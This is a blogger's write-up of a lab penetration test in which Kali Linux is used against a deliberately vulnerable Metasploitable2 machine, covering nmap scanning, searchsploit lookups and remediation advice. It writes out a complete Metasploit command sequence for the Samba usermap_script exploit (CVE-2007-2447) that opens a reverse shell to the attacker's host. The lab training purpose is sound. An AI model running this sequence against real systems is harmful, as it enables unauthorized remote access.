Dive into a real-world penetration testing scenario where I put theoretical knowledge into practice. This project, using Kali Linux against Metasploitable2, focused on mastering reconnaissance, exploitation, and crafting robust remediation plans. Here’s a detailed walkthrough of my journey and the invaluable lessons I gained.

Environment
Our simulated battleground comprised a Kali Linux virtual machine as the attack platform, targeting a vulnerable Metasploitable2 virtual machine.

1) Reconnaissance & Scanning
The initial phase kicked off with comprehensive network reconnaissance using nmap. I deployed a versatile nmap command (sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x) to identify open ports, active services, and their respective versions. Key findings included an unresponsive vsftpd 2.3.4 service on port 21/tcp and Samba smbd 3.x operating on port 445/tcp.

2) Enumeration & Triage
With an inventory of active services, the next step was enumeration and vulnerability identification. I leveraged searchsploit, a powerful tool for finding exploits in the Exploit-DB archive, cross-referencing our nmap XML output and specific service versions (searchsploit --nmap scans/target.xml, searchsploit vsftpd 2.3.4, searchsploit samba 3.0.20). This process highlighted two promising vulnerabilities: the vsftpd 2.3.4 backdoor (CVE-2011-2523) and the Samba username-map script exploit (CVE-2007-2447).

3) Exploitation
Moving to the exploitation phase, I first targeted the vsftpd backdoor (CVE-2011-2523) using Metasploit’s exploit/unix/ftp/vsftpd_234_backdoor module. Despite nmap indicating the vulnerable version, manual checks revealed the service was unresponsive, leading to an unsuccessful exploit attempt.

Undeterred, I turned my attention to the Samba username-map script vulnerability (CVE-2007-2447). Launching msfconsole, I configured the exploit/multi/samba/usermap_script module, setting the RHOSTS and RPORT to the target’s IP and Samba’s port (445), respectively. I selected a cmd/unix/reverse payload, configured LHOST to my Kali IP and LPORT to 4444, and initiated the exploit. This attempt was successful, granting me a crucial remote shell on the Metasploitable2 target.

msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.x.x
set RPORT 445
set payload cmd/unix/reverse
set LHOST <kali-ip>
set LPORT 4444
exploit

4) Post-Exploitation
Upon gaining a remote shell, post-exploitation began. I immediately verified my privileges using id and gathered system information with uname -a. Every step, including successful commands and their outputs, was meticulously documented with screenshots to serve as evidence for the remediation phase.

id
uname -a

5) Mitigation Summary
The final, and arguably most critical, phase involved developing a robust mitigation plan based on the identified vulnerabilities and successful exploit. My recommendations included:

• Proactive Security: Implementing continuous vulnerability scanning and maintaining an up-to-date asset inventory.
• Patch Management: Promptly updating Samba and all other services to their latest secure versions.
• Network Segmentation & Filtering: Restricting and blocking access to critical ports like 445 and 21 through firewall rules, coupled with effective network segmentation.
• Service Hardening: Disabling all unused services and removing guest/anonymous access where unnecessary.
• Least Privilege: Enforcing the principle of least privilege for all shares and user accounts.
• Monitoring & Response: Establishing comprehensive logging and monitoring, alongside developing a strong incident response plan.

Conclusion
This practical exercise culminated in successfully obtaining a remote shell on Metasploitable2 through the Samba exploit. The entire workflow, from initial scanning to post-exploitation and detailed mitigation planning, profoundly emphasized the importance of not just identifying vulnerabilities but also understanding the critical role of timely remediation and robust detection mechanisms in a comprehensive security strategy. For those interested in deeper insights, I’m happy to share the full repository containing scripts and example outputs.